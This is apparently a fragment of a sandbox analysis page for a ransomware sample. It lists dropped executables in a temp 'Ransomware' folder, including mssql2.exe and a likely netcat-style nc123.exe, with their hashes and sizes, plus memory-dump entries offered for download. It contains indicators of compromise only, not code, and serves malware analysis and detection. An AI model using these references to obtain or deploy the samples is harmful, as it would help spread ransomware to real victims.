2.0MB

MD5
af1f0dc67c565305d4707cfa55faa6c5

SHA1
d4da47615dc116ab4921cae535806db776a8a859

SHA256
6a6d47a30133a0fb65a3c4ee813abb8966f844539d43732c6172795998fe3215

SHA512
b2ce78d6a748aff29bd0717e9033bbc846b350b9e8449580e24e272382c27a6b4f52224a32c32890be03d85e317e249574ef61232191fc118e4a88b6faf69c58

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
1.1MB

MD5
8257808d3f2246a6c6ed190cc65b1ed6

SHA1
d3a89afaa23e72e5da1ae307501f8c534211fc64

SHA256
a92620e5819a1b56cefd9a357d185ecf942b5d4c3de65792c2ba4f45766145df

SHA512
a7384097dd1d345f93fde283063ef448328f59873faa009b2ee524911fe673ce582542916a0d93c49f4ea960fb22133e44dab3f66fa7aeb3a6abe4dda07a89da

Download Submit
\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
memory/2168-52-0x0000000003630000-0x0000000003D32000-memory.dmp

Filesize
7.0MB

Download
memory/2168-51-0x0000000003630000-0x0000000003D32000-memory.dmp

Filesize
7.0MB

Download
memory/2168-53-0x0000000003630000-0x0000000003D32000-memory.dmp

Filesize
7.0MB

Download
memory/2500-75-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2500-114-0x0000000076020000-0x0000000076130000-memory.dmp

Filesize
1.1MB

Download
memory/2500-117-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2500-118-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/2500-119-0x0000000076020000-0x0000000076130000-memory.dmp

Filesize
1.1MB

Download
memory/2604-116-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/2604-122-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/2604-129-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download